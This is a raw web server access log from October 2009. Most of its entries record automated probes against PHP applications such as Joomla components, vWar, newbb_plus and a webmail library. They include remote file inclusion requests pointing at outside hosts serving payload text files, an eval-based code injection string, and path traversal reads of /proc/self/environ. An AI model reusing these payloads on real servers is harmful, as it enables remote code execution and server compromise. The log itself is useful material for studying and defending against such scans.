85.128.60.100 - - [12/Oct/2009:02:24:08 -0400] "GET //index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:02:24:08 -0400] "GET /logs//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:24:09 -0400] "GET /logs/access_log.Q109092000%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:02:24:09 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:24:11 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:02:25:11 -0400] "GET /logs/access_log.Q109081500%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:25:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.205.103.171 - - [12/Oct/2009:02:26:58 -0400] "GET /logs/access_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
38.108.180.115 - - [12/Oct/2009:02:27:56 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.108.180.115 - - [12/Oct/2009:02:27:58 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
67.205.103.171 - - [12/Oct/2009:02:29:14 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:30:16 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:30:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.12.13.152 - - [12/Oct/2009:02:30:58 -0400] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:02:30:58 -0400] "GET /logs/access_log.Q109080600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:02:30:58 -0400] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:02:30:58 -0400] "GET /logs/error_log.Q109080600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:32:15 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:32:15 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:32:15 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:32:16 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:32:16 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:32:16 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:02:33:51 -0400] "GET /logs/access_log.Q109080500 HTTP/1.0" 200 3793390 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.140.23.192 - - [12/Oct/2009:02:35:30 -0400] "GET /logs/access_log.Q109070300%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:35:36 -0400] "GET /logs/access_log.Q109070300%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:02:35:38 -0400] "GET /logs/access_log.Q109092200%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:35:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [12/Oct/2009:02:35:46 -0400] "GET /logs/access_log.Q109092200%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:36:27 -0400] "GET /errors.php?error=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:36:27 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:36:28 -0400] "GET /logs/errors.php?error=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:02:36:36 -0400] "GET /logs/error_log.Q109080600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:36:38 -0400] "GET /logs/access_log.Q109082500/errors.php?error=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:37:21 -0400] "GET //?custompluginfile[]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:37:21 -0400] "GET /logs/access_log.Q109081800//?custompluginfile[]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:37:21 -0400] "GET /logs//?custompluginfile[]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:02:37:49 -0400] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:02:37:49 -0400] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:02:37:55 -0400] "GET /logs/access_log.Q109080600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:02:37:57 -0400] "GET /logs/error_log.Q109080600//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:39:54 -0400] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:39:54 -0400] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:39:57 -0400] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:39:57 -0400] "GET /logs/access_log.Q109092900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:39:57 -0400] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:07 -0400] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:08 -0400] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:26 -0400] "GET /logs/access_log.Q109092900%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:40 -0400] "GET /logs/access_log.Q109092900%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:44 -0400] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:44 -0400] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:40:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.185.129.36 - - [12/Oct/2009:02:40:48 -0400] "GET /logs/access_log.Q109092900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:48 -0400] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:48 -0400] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:50 -0400] "GET /logs/access_log.Q109092900/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:50 -0400] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:02:40:50 -0400] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:02:40:59 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:41:13 -0400] "GET /logs/error_log.Q109090300/?conteudo=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:41:14 -0400] "GET /?conteudo=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:41:14 -0400] "GET /logs/error_log.Q109062300/?conteudo=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:41:14 -0400] "GET /logs/?conteudo=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:02:44:05 -0400] "GET /images/LCALEN.HTM HTTP/1.0" 200 7943 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Oct/2009:02:45:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.111.160.5 - - [12/Oct/2009:02:46:42 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:48:02 -0400] "GET /logs/access_log.Q109082500%20%20/errors.php?error=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:50:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.135.59.136 - - [12/Oct/2009:02:52:05 -0400] "GET //common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:05 -0400] "GET /logs//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:11 -0400] "GET //common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:14 -0400] "GET /logs//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:29 -0400] "GET /logs/access_log.Q109070500//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:36 -0400] "GET //common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:36 -0400] "GET /logs//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:36 -0400] "GET /logs//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:38 -0400] "GET /logs/access_log.Q109070500//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:38 -0400] "GET //common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:53 -0400] "GET //common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:53 -0400] "GET /logs//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:55 -0400] "GET //common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:52:57 -0400] "GET /logs//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:53:06 -0400] "GET /logs/access_log.Q109070500%20%20//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.135.59.136 - - [12/Oct/2009:02:53:06 -0400] "GET /logs/access_log.Q109070500%20%20//common/db.php?commonpath=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:54:08 -0400] "GET /logs/error_log.Q109060700/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:54:08 -0400] "GET /?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:54:08 -0400] "GET /logs/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:54:33 -0400] "GET /logs/access_log.Q109072200/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:55:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.1.24.160 - - [12/Oct/2009:02:56:47 -0400] "GET /logs/error_log.Q109060700/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:56:47 -0400] "GET /?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:56:47 -0400] "GET /logs/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:02:57:11 -0400] "GET /logs/access_log.Q109072200/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.64.75.54 - - [12/Oct/2009:02:59:28 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.64.75.54 - - [12/Oct/2009:02:59:28 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.64.75.54 - - [12/Oct/2009:02:59:28 -0400] "GET /?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.64.75.54 - - [12/Oct/2009:02:59:29 -0400] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 200 21518 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.64.75.54 - - [12/Oct/2009:02:59:54 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.64.75.54 - - [12/Oct/2009:02:59:54 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.64.75.54 - - [12/Oct/2009:02:59:54 -0400] "GET /?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.64.75.54 - - [12/Oct/2009:02:59:54 -0400] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 200 21518 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
217.70.32.2 - - [12/Oct/2009:03:00:16 -0400] "GET /logs/access_log.Q109063000/rb? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
217.70.32.2 - - [12/Oct/2009:03:00:16 -0400] "GET /rb? HTTP/1.1" 404 200 "-" "libwww-perl/5.803"
217.70.32.2 - - [12/Oct/2009:03:00:17 -0400] "GET /logs/rb? HTTP/1.1" 404 205 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/Oct/2009:03:00:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
196.202.206.115 - - [12/Oct/2009:03:01:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
196.202.206.115 - - [12/Oct/2009:03:01:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
196.202.206.115 - - [12/Oct/2009:03:01:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
196.202.206.115 - - [12/Oct/2009:03:01:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
118.129.166.10 - - [12/Oct/2009:03:04:33 -0400] "GET /logs/access_log.Q109090300%20%20//ask_password.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Oct/2009:03:04:33 -0400] "GET /logs//ask_password.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Oct/2009:03:04:33 -0400] "GET //ask_password.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:03:04:46 -0400] "GET /logs/access_log.Q109051100/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:03:05:01 -0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Oct/2009:03:05:03 -0400] "GET /logs/access_log.Q109090300//ask_password.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:03:05:08 -0400] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:03:05:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.12.13.152 - - [12/Oct/2009:03:07:59 -0400] "GET //components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:03:07:59 -0400] "GET /logs/access_log.Q109080200//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:03:07:59 -0400] "GET /logs//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
